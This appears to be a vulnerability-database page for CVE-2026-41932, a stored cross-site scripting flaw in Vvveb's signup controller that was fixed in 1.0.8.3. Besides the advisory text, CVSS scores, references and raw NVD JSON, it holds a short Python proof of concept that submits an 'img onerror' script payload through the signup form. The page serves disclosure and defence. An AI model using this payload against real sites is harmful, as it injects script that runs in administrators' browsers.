CVE-2026-41932

Description

Vvveb before 1.0.8.3 contains a stored cross-site scripting vulnerability in the customer signup flow where the Signup::addUser() controller copies raw POST username values into the display_name field before sanitization occurs. Attackers can submit HTML and script markup in the username field during signup, which gets stripped from the username column but persisted verbatim in the display_name column, allowing stored XSS execution when display_name is rendered without encoding in vulnerable views.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL (Example, needs to be adjusted to actual environment) target_url = "http://localhost/index.php?module=signup&action=addUser" # Malicious payload to be stored in display_name # The payload attempts to execute JavaScript when an admin views the user list xss_payload = "<img src=x onerror=alert('CVE-2026-41932_Stored_XSS')>" # Prepare registration data payload_data = { "username": xss_payload, # This gets copied to display_name before sanitization "email": "[email protected]", "password": "Password123!", "first_name": "Attacker", "last_name": "User" } try: response = requests.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Exploit request sent successfully.") print("[+] Check the admin user list to verify XSS execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41932
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41932
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41932/
[4] VulDB https://vuldb.com/cve/CVE-2026-41932
[5] https://github.com/givanz/Vvveb/commit/fefac290a8c85d3c87fe80ffed68b6c5bc50e93c
[6] https://github.com/givanz/Vvveb/releases/tag/1.0.8.3
[7] https://www.vulncheck.com/advisories/vvveb-stored-xss-via-signup-controller

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41932", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:45.730", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.3 contains a stored cross-site scripting vulnerability in the customer signup flow where the Signup::addUser() controller copies raw POST username values into the display_name field before sanitization occurs. Attackers can submit HTML and script markup in the username field during signup, which gets stripped from the username column but persisted verbatim in the display_name column, allowing stored XSS execution when display_name is rendered without encoding in vulnerable views."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/fefac290a8c85d3c87fe80ffed68b6c5bc50e93c", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-stored-xss-via-signup-controller", "source": "[email protected]"}]}}